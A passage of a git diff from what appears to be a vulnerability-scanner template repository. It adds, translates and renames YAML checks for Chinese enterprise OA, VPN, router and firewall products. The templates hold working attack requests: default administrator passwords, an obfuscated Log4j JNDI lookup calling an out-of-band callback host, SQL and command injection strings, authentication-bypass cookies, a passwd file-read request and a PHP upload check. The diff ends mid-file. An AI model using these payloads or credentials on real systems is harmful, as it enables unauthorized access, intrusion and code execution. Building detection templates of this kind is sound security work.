.../seeyon-oa-a6-config-jsp-info-leak.yaml | 31 --------- .../seeyon-oa-a6-createMysql-info-leak.yaml | 31 --------- ...n-oa-a6-initDataAssess-user-info-leak.yaml | 31 --------- .../seeyon/seeyon-oa-a6-setextno-sqli.yaml | 29 --------- .../seeyon/seeyon-oa-a8-default-login.yaml | 32 ---------- ...seeyon-oa-a8-m-information-disclosure.yaml | 44 ------------- .../seeyon/seeyon-oa-fastjson-rce.yaml | 15 +++-- .../seeyon-oa-initdataassess-infoleak.yaml | 34 ++++++++++ .../seeyon/seeyon-oa-log4jshell.yaml | 28 -------- .../seeyon/seeyon-oa-setextno-sqli.yaml | 38 +++++++++++ .../seeyon/seeyon-oa-sp2-file-upload.yaml | 56 ++++++++++++++++ ...psAssistServlet-arbitrary-file-upload.yaml | 29 --------- .../smartbi/smartbi-default-user.yaml | 33 ---------- .../smartbi/smartbi-deserialization.yaml | 48 ++++++++++++++ ...artbi-windowunloading-deserialization.yaml | 31 --------- .../wayos-ac/wayos-ac-weak-login.yaml | 47 -------------- .../weaver/CNVD-2023-12632.yaml | 41 ------------ .../weaver/ecology-oa-byxml-xxe.yaml | 24 ------- ...ecology-oa-filedownloadforoutdoc-sqli.yaml | 25 -------- .../weaver/ecology/ecology-oa-byxml-xxe.yaml | 43 +++++++++++++ 43 files changed, 863 insertions(+), 740 deletions(-) create mode 100755 http/default-logins/others/cnzxsoft-default-login.yaml delete mode 100755 http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml create mode 100755 http/default-logins/seeyon/seeyon-a8-default-login.yaml create mode 100755 http/default-logins/seeyon/seeyon-monitor-default-login.yaml create mode 100755 http/default-logins/smartbi/smartbi-default-login.yaml create mode 100755 http/default-logins/wayos/ac-weak-login.yaml create mode 100755 http/vulnerabilities/other/seeyon-oa-log4j.yaml create mode 100755 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml delete mode 100755 http/vulnerabilities/qax/unauthenticated-qax-vpn-access.yaml delete mode 100644 http/vulnerabilities/realor/realor-gwt-system-sql-injection.yaml create mode 100644 http/vulnerabilities/realor/realor-gwt-system-sqli.yaml create mode 100644 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml delete mode 100644 http/vulnerabilities/ruijie/ruijie-nbr-router-fileupload-upload.yaml delete mode 100644 http/vulnerabilities/sangfor/sangfor-ad-rce.yaml create mode 100644 http/vulnerabilities/sangfor/sangfor-login-rce.yaml create mode 100644 http/vulnerabilities/secworld/secgate-3600-file-upload.yaml delete mode 100644 http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml delete mode 100755 http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml delete mode 100755 http/vulnerabilities/smartbi/smartbi-default-user.yaml create mode 100755 http/vulnerabilities/smartbi/smartbi-deserialization.yaml delete mode 100755 http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml delete mode 100755 http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml delete mode 100755 http/vulnerabilities/weaver/CNVD-2023-12632.yaml delete mode 100755 http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml delete mode 100755 http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml create mode 100755 http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml index b0237dc850..3c3c31bf41 100755 --- a/http/default-logins/o2oa/o2oa-default-login.yaml +++ b/http/default-logins/o2oa/o2oa-default-login.yaml @@ -1,10 +1,15 @@ id: o2oa-default-login info: - name: O2OA Default Login + name: O2OA - Default Login author: SleepingBag945 - severity: critical - description: O2O存在默认密码xadmin/o2,登录后台可执行系统命令 + severity: high + description: | + O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises. + metadata: + max-request: 1 + shodan-query: title=="O2OA" + verified: true tags: o2oa,default-login http: @@ -17,18 +22,29 @@ http: Accept: text/html,application/json,*/* Content-Type: application/json; charset=UTF-8 - {"credential":"xadmin","password":"o2"} + {"credential":"{{username}}","password":"{{password}}"} + + payloads: + username: + - 'xadmin' + password: + - 'o2' + attack: pitchfork matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "\"type\": \"success\"" - "distinguishedName" - part: body condition: and -# 执行命令看这里 http://wiki.peiqi.tech/wiki/oa/O2OA/O2OA%20invoke%20后台远程命令执行漏洞%20CNVD-2020-18740.html + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/default-logins/others/cnzxsoft-default-login.yaml b/http/default-logins/others/cnzxsoft-default-login.yaml new file mode 100755 index 0000000000..e28db30247 --- /dev/null +++ b/http/default-logins/others/cnzxsoft-default-login.yaml @@ -0,0 +1,37 @@ +id: cnzxsoft-default-login + +info: + name: Cnzxsoft System - Default Login + author: SleepingBag945 + severity: high + description: | + Cnzxsoft Golden Shield Information Security Management System has a default weak password. + metadata: + max-request: 1 + fofa-query: 'title=="中新金盾信息安全管理系统"' + verified: true + tags: default-login,cnzxsoft + +http: + - raw: + - | + POST /?q=common/login HTTP/1.1 + Host: {{Hostname}} + Cookie: check_code=ptbh + Content-Type: application/x-www-form-urlencoded + + name={{username}}&password={{password}}&checkcode=ptbh&doLoginSubmit=1 + + payloads: + username: + - 'admin' + password: + - 'zxsoft1234!@#$' + attack: pitchfork + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")' + condition: and \ No newline at end of file diff --git a/http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml b/http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml deleted file mode 100755 index e9e7e92288..0000000000 --- a/http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: cnzxsoft-information-security-management-system-default-login - -info: - name: cnzxsoft information security management system default account - author: SleepingBag945 - severity: high - description: | - cnzxsoft Golden Shield Information Security Management System has a default weak password. - tags: default - -http: - - raw: - - | - POST /?q=common/login HTTP/1.1 - Host: {{Hostname}} - Cookie: check_code=ptbh - Content-Type: application/x-www-form-urlencoded - - name=admin&password=zxsoft1234!%40%23%24&checkcode=ptbh&doLoginSubmit=1 - - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 200 && contains(body_1,"1") && contains(header_1,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")' - condition: and - -#zxsoft1234!@#$ -#验证码能绕过,直接登录即可 \ No newline at end of file diff --git a/http/default-logins/seeyon/seeyon-a8-default-login.yaml b/http/default-logins/seeyon/seeyon-a8-default-login.yaml new file mode 100755 index 0000000000..961286d77b --- /dev/null +++ b/http/default-logins/seeyon/seeyon-a8-default-login.yaml @@ -0,0 +1,47 @@ +id: seeyon-a8-default-login + +info: + name: Seeyon OA A8 - Default Login + author: SleepingBag945 + severity: high + description: | + Seeyon (seeyon) OA A8+ Enterprise Edition has a weak password vulnerability, which can be used to log in to the background + metadata: + max-request: 1 + fofa-query: app="致远互联-OA" + verified: true + tags: seeyon,oa,default-login + +http: + - raw: + - | + POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + UserAgentFrom=iphone&login_username={{username}}&login_password={{password}} + + payloads: + username: + - 'audit-admin' + password: + - 'seeyon123456' + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"LoginOK\":\"ok\"" + - "audit-admin" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/http/default-logins/seeyon/seeyon-monitor-default-login.yaml b/http/default-logins/seeyon/seeyon-monitor-default-login.yaml new file mode 100755 index 0000000000..6d808d5735 --- /dev/null +++ b/http/default-logins/seeyon/seeyon-monitor-default-login.yaml @@ -0,0 +1,41 @@ +id: seeyon-monitor-default-login + +info: + name: Seeyon A8 Management Monitor - Default Login + author: SleepingBag945 + severity: high + description: | + Seeyon OA A8-m has status monitoring page information leakage. Attackers can obtain sensitive information such as website paths and user names for further attacks. Attackers can use this vulnerability to directly enter the application system or management system to conduct system, web page, data tampering and deletion, illegally obtaining system and user data, and may even cause the server to collapse. + reference: + - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/default-pwd/seeyon-a8-management-monitor-default-password.yaml + metadata: + max-request: 1 + fofa-query: app="致远互联-OA" + verified: true + tags: seeyon,oa,default-login + +http: + - raw: + - | + POST /seeyon/management/index.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + password=WLCCYBD%40SEEYON + + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "A8 Management Monitor" + - "Connection Pooling" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/default-logins/smartbi/smartbi-default-login.yaml b/http/default-logins/smartbi/smartbi-default-login.yaml new file mode 100755 index 0000000000..6e81c15ce8 --- /dev/null +++ b/http/default-logins/smartbi/smartbi-default-login.yaml @@ -0,0 +1,55 @@ +id: smartbi-default-login + +info: + name: SmartBI - Default Login + author: SleepingBag945 + severity: high + description: | + Smartbi Default User Weak Password were discovered. + reference: + - https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-default-user-weakpass.yaml + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="SMARTBI" + verified: true + tags: smartbi,default-login + +http: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + className=UserService&methodName=loginFromDB¶ms=["{{role}}","0a"] + + payloads: + path: + - /smartbi/vision/RMIServlet + - /vision/RMIServlet + + role: + - system + - service + - public + + attack: pitchfork + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"result":true' + + - type: word + part: header + words: + - 'text/plain' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/default-logins/wayos/ac-weak-login.yaml b/http/default-logins/wayos/ac-weak-login.yaml new file mode 100755 index 0000000000..9a000d3464 --- /dev/null +++ b/http/default-logins/wayos/ac-weak-login.yaml @@ -0,0 +1,56 @@ +id: ac-default-login + +info: + name: AC Centralized Management System - Default password + author: SleepingBag945 + severity: high + description: | + AC Centralized Management System default login credentials were discovered. + reference: + - https://github.com/Ershu1/2021_Hvv/blob/main/Wayos%20AC%E9%9B%86%E4%B8%AD%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%BC%B1%E5%8F%A3%E4%BB%A4.md + - https://github.com/chaitin/xray/blob/master/pocs/secnet-ac-default-password.yml + metadata: + verified: "true" + fofa-query: 'title="安网科技-智能路由系统"' + max-request: 1 + tags: ways-ac,default-login + +http: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&password={{ password }}&Submit=%E7%99%BB%E5%BD%95 + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + - 123456 + - 12345678 + - password + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "ac_userid=admin" + - "ac_passwd=" + condition: and + + - type: word + part: body + words: + - "window.open" + - "text/javascript" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/other/sanhui-smg-file-read.yaml b/http/vulnerabilities/other/sanhui-smg-file-read.yaml index 0f6ad61f02..12a7a888f8 100755 --- a/http/vulnerabilities/other/sanhui-smg-file-read.yaml +++ b/http/vulnerabilities/other/sanhui-smg-file-read.yaml @@ -1,23 +1,25 @@ id: sanhui-smg-file-read info: - name: 三汇SMG 网关管理软件 down.php 任意文件读取漏洞 + name: Synway SMG Gateway down.php - Arbitrary File Read author: SleepingBag945 severity: high - description: 三汇SMG 网关管理软件 down.php文件中存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件 - tags: sanhui-smg + description: | + There is an arbitrary file reading vulnerability in the down.php file of Synway SMG gateway management software, through which an attacker can download any file from the server. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%89%E6%B1%87SMG%20%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6%20down.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: body="text ml10 mr20" && title="网关管理软件" + tags: sanhui-smg,lfi,gateway http: - raw: - | POST /down.php HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfA9vzLuw6Gmtnmv2 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 ------WebKitFormBoundaryfA9vzLuw6Gmtnmv2 Content-Disposition: form-data; name="downfile" @@ -32,15 +34,20 @@ http: ------WebKitFormBoundaryfA9vzLuw6Gmtnmv2-- - matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + + - type: word + part: header + words: + - "application/octet-stream" + - "filename=passwd" + condition: and - type: status status: - 200 - diff --git a/http/vulnerabilities/other/seeyon-oa-log4j.yaml b/http/vulnerabilities/other/seeyon-oa-log4j.yaml new file mode 100755 index 0000000000..f6063b26cc --- /dev/null +++ b/http/vulnerabilities/other/seeyon-oa-log4j.yaml @@ -0,0 +1,47 @@ +id: seeyon-oa-log4j + +info: + name: Seeyon OA (Log4j) - Remote Code Execution + author: SleepingBag945 + severity: critical + description: | + Seeyon OA is susceptible to remote code execution via the Apache Log4j 2 library prior to 2.15.0 by recording its own log information, specifically with specially crafted values sent as user input. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - https://blog.csdn.net/xd_2021/article/details/122232463 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + fofa-query: app="致远互联-OA" + verified: true + tags: cve,cve2021,rce,jndi,log4j,seeyon-oa,kev,oast + +http: + - raw: + - | + POST /seeyon/main.do?method=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: location + words: + - "/seeyon/main.do" + + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml b/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml index 767fa7afce..13743e4490 100755 --- a/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml +++ b/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml @@ -1,11 +1,17 @@ id: zhixiang-oa-msglog-sqli + info: - name: zhixiang-oa-msglog-sqli + name: Zhixiang OA msglog.aspx - SQL injection author: SleepingBag945 severity: high - description: 致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息 + description: There is a SQL injection vulnerability in the msglog.aspx file of Zhixiang OA. Attackers can obtain sensitive information through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="致翔软件-致翔OA" + verified: true tags: hongfan,oa,sqli http: @@ -13,16 +19,11 @@ http: - | GET /mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27127381%27))))-- HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 500 && contains(body_1, "43f845fa0c8aef9104f8e1b07625ecf8")' - condition: and - -# 可以试着sqlmap osshell \ No newline at end of file + - 'status_code == 500' + - 'contains(body, "43f845fa0c8aef9104f8e1b07625ecf8")' + - 'contains(header, "text/html")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml new file mode 100755 index 0000000000..c18d32766c --- /dev/null +++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml @@ -0,0 +1,41 @@ +id: secsslvpn-auth-bypass + +info: + name: Secure Access Gateway SecSSLVPN - Authentication Bypass + author: SleepingBag945 + severity: high + description: | + The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability. + reference: + - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="安全接入网关SecSSLVPN" + verified: true + tags: secsslvpn,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin/group/x_group.php?id=1" + headers: + Cookie: admin_id=1; gw_admin_ticket=1; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "group_action.php" + - "anonymous" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/qax/unauthenticated-qax-vpn-access.yaml b/http/vulnerabilities/qax/unauthenticated-qax-vpn-access.yaml deleted file mode 100755 index 936a1faaef..0000000000 --- a/http/vulnerabilities/qax/unauthenticated-qax-vpn-access.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: unauthenticated-qax-vpn-access - -info: - name: QAX-VPN - Authentication Bypass - author: unknwon - severity: critical - description: "QAX-VPN has unauthorized management user traversal and any account password modification." - reference: - - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA - tags: qan-vpn,unauth - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/admin/group/x_group.php?id=1" - headers: - Cookie: admin_id=1; gw_admin_ticket=1; - matchers: - - type: word - words: - - "javascript:RemoveUserFromList()" - part: body - diff --git a/http/vulnerabilities/realor/realor-gwt-system-sql-injection.yaml b/http/vulnerabilities/realor/realor-gwt-system-sql-injection.yaml deleted file mode 100644 index 8705b454b6..0000000000 --- a/http/vulnerabilities/realor/realor-gwt-system-sql-injection.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: realor-gwt-system-sql-injection - -info: - name: 瑞友天翼应用虚拟化系统远程代码漏洞 - author: SleepingBag945 - severity: critical - description: 瑞友天翼应用虚拟化系统由于对用户传入的数据安全处理不当,导致存在 SQL 注入漏洞,远程且未经过授权认证的攻击者可利用此漏洞获取数据库里敏感信息,也可进一步写入 webshell 后门访问,攻击者从而可在目标服务器上执行任意恶意代码,获取系统权限。 - tags: realor,sqli - -http: - - raw: - - | - GET /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6 HTTP/1.1 - Host: {{Hostname}} - - - | - GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1 - Host: {{Hostname}} - - - | - GET /Board.XGI HTTP/1.1 - Cookie: PHPSESSID={{cookie}} - Host: {{Hostname}} - - extractors: - - type: regex - name: cookie - internal: true - part: header - group: 1 - regex: - - 'PHPSESSID=(.*?);' - - - matchers: - - type: dsl - dsl: - - contains(body_1,"未查询到符合条件的用户") || (contains(body_2,"CustomInfo") && contains(header_2,"PHPSESSID")) - - contains(body_3,"src=\"custom/") - condition: and diff --git a/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml b/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml new file mode 100644 index 0000000000..d26a0d23a8 --- /dev/null +++ b/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml @@ -0,0 +1,42 @@ +id: realor-gwt-system-sqli + +info: + name: Realor GWT System SQL injection + author: SleepingBag945 + severity: high + description: | + Realor GWT System system improperly handles the security of data passed by users, resulting in a SQL injection vulnerability. Remote and unauthorized attackers can use this vulnerability to obtain sensitive information in the database, and can further write webshell backdoors. Access, the attacker can execute arbitrary malicious code on the target server and gain system privileges. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/realor-gwt-system-sql-injection.yaml + metadata: + verified: "true" + fofa-query: 'app="REALOR-天翼应用虚拟化系统"' + max-request: 1 + tags: realor,sqli + +http: + - raw: + - | + GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1 + Host: {{Hostname}} + + - | + GET /Board.XGI HTTP/1.1 + Cookie: PHPSESSID={{cookie}} + Host: {{Hostname}} + + extractors: + - type: regex + name: cookie + internal: true + part: header + group: 1 + regex: + - 'PHPSESSID=(.*?);' + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"CustomInfo") && contains(header_1,"PHPSESSID")' + - 'contains(body_2,"src=\"custom/")' + condition: and diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml new file mode 100644 index 0000000000..b79048fe2f --- /dev/null +++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml @@ -0,0 +1,41 @@ +id: ruijie-nbr-fileupload + +info: + name: Ruijie NBR fileupload.php - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml + metadata: + max-request: 1 + fofa-query: app="Ruijie-NBR路由器" + verified: true + tags: ruijie,file-upload,intrusive,nbr + +variables: + filename: "{{rand_base(6)}}" + string: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/plain, */*; q=0.01 + Content-Disposition: form-data; name="file"; filename="{{filename}}.php" + Content-Type: image/jpeg + + + + - | + GET /ddi/server/upload/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,"jsonrpc") + - status_code_2 == 200 && contains(body_2,"{{string}}") + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-router-fileupload-upload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-router-fileupload-upload.yaml deleted file mode 100644 index bc52ee6b10..0000000000 --- a/http/vulnerabilities/ruijie/ruijie-nbr-router-fileupload-upload.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: ruijie-nbr-router-fileupload-upload - -info: - name: 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞 - author: SleepingBag945 - severity: critical - description: 锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器获取服务器权限 - tags: yonyou - -http: - - raw: - - | - POST /ddi/server/fileupload.php?uploadDir=upload&name={{randstr_2}}.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg - - - - - | - GET /ddi/server/upload/{{randstr_2}}.php HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - status_code_1 == 200 - - status_code_2 == 200 && contains(body_2,"{{randstr_1}}") - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/sangfor/sangfor-ad-rce.yaml b/http/vulnerabilities/sangfor/sangfor-ad-rce.yaml deleted file mode 100644 index 16a8d6ac5a..0000000000 --- a/http/vulnerabilities/sangfor/sangfor-ad-rce.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: sangfor-ad-rce - -info: - name: 深信服应用交付管理统远程命令执行 - author: SleepingBag945 - severity: critical - description: 深信服应用交付管理系统远程命令执行 - tags: sangfor,ad,rce - -http: - - raw: - - | - POST /rep/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 - - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 - - contains(body_1,'uid=') - condition: and - - diff --git a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml new file mode 100644 index 0000000000..7cb79fe1b0 --- /dev/null +++ b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml @@ -0,0 +1,33 @@ +id: sangfor-login-rce + +info: + name: Sangfor Application Login - Remote Command Execution + author: SleepingBag945 + severity: critical + description: | + Sangfor application delivery management system login has a remote command execution vulnerability, through which an attacker can obtain server privileges and execute arbitrary commands + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml + metadata: + max-request: 1 + fofa-query: fid="iaytNA57019/kADk8Nev7g==" + verified: true + tags: sangfor,ad,rce + +http: + - raw: + - | + POST /rep/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code == 200 + - regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)", body) + - contains(body, "cluster_mode_others") + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml new file mode 100644 index 0000000000..807bde2465 --- /dev/null +++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml @@ -0,0 +1,64 @@ +id: secgate-3600-file-upload + +info: + name: SecGate 3600 Firewall 